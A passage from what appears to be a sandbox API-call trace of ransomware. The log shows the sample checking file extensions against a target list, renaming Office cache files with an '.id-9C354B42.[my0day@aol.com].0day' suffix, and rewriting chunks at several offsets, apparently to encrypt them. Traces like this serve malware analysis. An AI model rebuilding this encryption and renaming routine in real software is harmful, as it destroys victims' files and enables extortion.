dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0033.738] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=485760) returned 1 [0033.738] CloseHandle (hObject=0x174) returned 1 [0033.738] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe")) returned 0x20 [0033.738] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\memtest.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.738] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.738] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0033.738] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0033.738] lstrlenW (lpString=".doc") returned 4 [0033.738] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0033.738] lstrlenW (lpString=".docx") returned 5 [0033.738] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0033.738] lstrlenW (lpString=".pdf") returned 4 [0033.738] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0033.738] lstrlenW (lpString=".xls") returned 4 [0033.738] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0033.738] lstrlenW (lpString=".xlsx") returned 5 [0033.738] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0033.738] lstrlenW (lpString=".ppt") returned 4 [0033.738] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0033.738] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0033.738] lstrlenW (lpString=".zip") returned 4 [0033.738] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0033.738] lstrlenW (lpString=".rar") returned 4 [0033.738] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0033.738] lstrlenW (lpString=".bz2") returned 4 [0033.739] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0033.739] lstrlenW (lpString=".7z") returned 3 [0033.739] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0033.743] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0033.747] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0033.747] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0x0) returned 1 [0033.747] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0033.747] ReadFile (in: hFile=0x174, lpBuffer=0x3c80058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c80058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.755] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0033.755] ReadFile (in: hFile=0x174, lpBuffer=0x3cc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3cc0058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.761] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0033.761] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfefcbb, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0033.761] ReadFile (in: hFile=0x174, lpBuffer=0x3d00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3d00058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.025] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.025] WriteFile (in: hFile=0x174, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x34bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0034.038] SetEndOfFile (hFile=0x174) returned 1 [0034.038] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ed3070 [0034.042] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0034.042] WriteFile (in: hFile=0x174, lpBuffer=0x3ed3070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed3070*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.043] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0034.043] WriteFile (in: hFile=0x174, lpBuffer=0x3ed3070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed3070*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.044] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfefcbb, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0034.044] WriteFile (in: hFile=0x174, lpBuffer=0x3ed3070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed3070*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.045] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed3070 | out: hHeap=0x5f0000) returned 1 [0034.045] CloseHandle (hObject=0x174) returned 1 [0036.474] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0036.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.474] lstrlenW (lpString=".doc") returned 4 [0036.474] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0036.474] lstrlenW (lpString=".docx") returned 5 [0036.474] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0036.474] lstrlenW (lpString=".pdf") returned 4 [0036.474] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0036.474] lstrlenW (lpString=".xls") returned 4 [0036.474] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0036.474] lstrlenW (lpString=".xlsx") returned 5 [0036.474] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0036.474] lstrlenW (lpString=".ppt") returned 4 [0036.474] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0036.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.474] lstrlenW (lpString=".zip") returned 4 [0036.474] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0036.474] lstrlenW (lpString=".rar") returned 4 [0036.474] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0036.474] lstrlenW (lpString=".bz2") returned 4 [0036.474] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0036.474] lstrlenW (lpString=".7z") returned 3 [0036.475] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0036.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.475] lstrlenW (lpString=".dbf") returned 4 [0036.475] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0036.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.475] lstrlenW (lpString=".1cd") returned 4 [0036.475] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0036.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.475] lstrlenW (lpString=".jpg") returned 4 [0036.475] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0036.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.475] lstrlenW (lpString=".doc") returned 4 [0036.475] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0036.475] lstrlenW (lpString=".docx") returned 5 [0036.475] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0036.475] lstrlenW (lpString=".pdf") returned 4 [0036.475] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0036.475] lstrlenW (lpString=".xls") returned 4 [0036.475] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0036.475] lstrlenW (lpString=".xlsx") returned 5 [0036.475] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0036.475] lstrlenW (lpString=".ppt") returned 4 [0036.475] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0036.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.475] lstrlenW (lpString=".zip") returned 4 [0036.475] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0036.475] lstrlenW (lpString=".rar") returned 4 [0036.475] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0036.475] lstrlenW (lpString=".bz2") returned 4 [0036.475] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0036.475] lstrlenW (lpString=".7z") returned 3 [0036.475] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0036.476] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.476] lstrlenW (lpString=".dbf") returned 4 [0036.476] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0036.476] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.476] lstrlenW (lpString=".1cd") returned 4 [0036.476] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0036.476] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.476] lstrlenW (lpString=".jpg") returned 4 [0036.476] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0036.476] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0036.476] lstrlenW (lpString="OutlookMUI.msi") returned 14 [0036.476] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0036.476] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=2865664) returned 1 [0036.476] CloseHandle (hObject=0x174) returned 1 [0036.476] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi")) returned 0x2020 [0036.476] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.477] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0036.477] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0036.477] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0x0) returned 1 [0036.477] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0036.477] ReadFile (in: hFile=0x174, lpBuffer=0x3c80058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c80058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.775] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xe9355, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0036.775] ReadFile (in: hFile=0x174, lpBuffer=0x3cc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3cc0058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.786] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0036.786] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x27ba00, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0036.786] ReadFile (in: hFile=0x174, lpBuffer=0x3d00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3d00058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.803] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.803] WriteFile (in: hFile=0x174, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x34bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0036.994] SetEndOfFile (hFile=0x174) returned 1 [0036.994] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f7a0a8 [0036.998] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0036.998] WriteFile (in: hFile=0x174, lpBuffer=0x3f7a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f7a0a8*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.999] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xe9355, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0036.999] WriteFile (in: hFile=0x174, lpBuffer=0x3f7a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f7a0a8*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.004] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x27ba00, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0037.004] WriteFile (in: hFile=0x174, lpBuffer=0x3f7a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f7a0a8*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.006] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f7a0a8 | out: hHeap=0x5f0000) returned 1 [0037.006] CloseHandle (hObject=0x174) returned 1 [0037.714] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0037.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.714] lstrlenW (lpString=".doc") returned 4 [0037.714] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0037.714] lstrlenW (lpString=".docx") returned 5 [0037.714] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0037.714] lstrlenW (lpString=".pdf") returned 4 [0037.714] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0037.714] lstrlenW (lpString=".xls") returned 4 [0037.714] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0037.714] lstrlenW (lpString=".xlsx") returned 5 [0037.714] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0037.714] lstrlenW (lpString=".ppt") returned 4 [0037.714] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0037.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.714] lstrlenW (lpString=".zip") returned 4 [0037.714] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0037.714] lstrlenW (lpString=".rar") returned 4 [0037.714] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0037.714] lstrlenW (lpString=".bz2") returned 4 [0037.714] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0037.715] lstrlenW (lpString=".7z") returned 3 [0037.715] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0037.715] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.715] lstrlenW (lpString=".dbf") returned 4 [0037.715] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0037.715] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.715] lstrlenW (lpString=".1cd") returned 4 [0037.715] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0037.715] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.715] lstrlenW (lpString=".jpg") returned 4 [0037.715] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0037.715] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.715] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.715] lstrlenW (lpString=".doc") returned 4 [0037.715] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0037.715] lstrlenW (lpString=".docx") returned 5 [0037.715] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0037.715] lstrlenW (lpString=".pdf") returned 4 [0037.715] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0037.715] lstrlenW (lpString=".xls") returned 4 [0037.715] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0037.715] lstrlenW (lpString=".xlsx") returned 5 [0037.715] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0037.715] lstrlenW (lpString=".ppt") returned 4 [0037.715] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0037.715] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.715] lstrlenW (lpString=".zip") returned 4 [0037.715] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0037.715] lstrlenW (lpString=".rar") returned 4 [0037.715] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0037.715] lstrlenW (lpString=".bz2") returned 4 [0037.715] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0037.715] lstrlenW (lpString=".7z") returned 3 [0037.716] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0037.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.716] lstrlenW (lpString=".dbf") returned 4 [0037.716] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0037.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.716] lstrlenW (lpString=".1cd") returned 4 [0037.716] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0037.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.716] lstrlenW (lpString=".jpg") returned 4 [0037.716] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0037.716] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0037.716] lstrlenW (lpString="Proof.cab") returned 9 [0037.716] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0037.716] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=11482605) returned 1 [0037.716] CloseHandle (hObject=0x174) returned 1 [0037.716] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab")) returned 0x2020 [0037.716] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.716] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0037.717] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0037.717] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0x0) returned 1 [0037.717] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0037.717] ReadFile (in: hFile=0x174, lpBuffer=0x3c80058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c80058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.951] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x3a674f, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0037.951] ReadFile (in: hFile=0x174, lpBuffer=0x3cc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3cc0058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.967] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0037.967] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xab35ed, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0037.967] ReadFile (in: hFile=0x174, lpBuffer=0x3d00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3d00058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.983] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 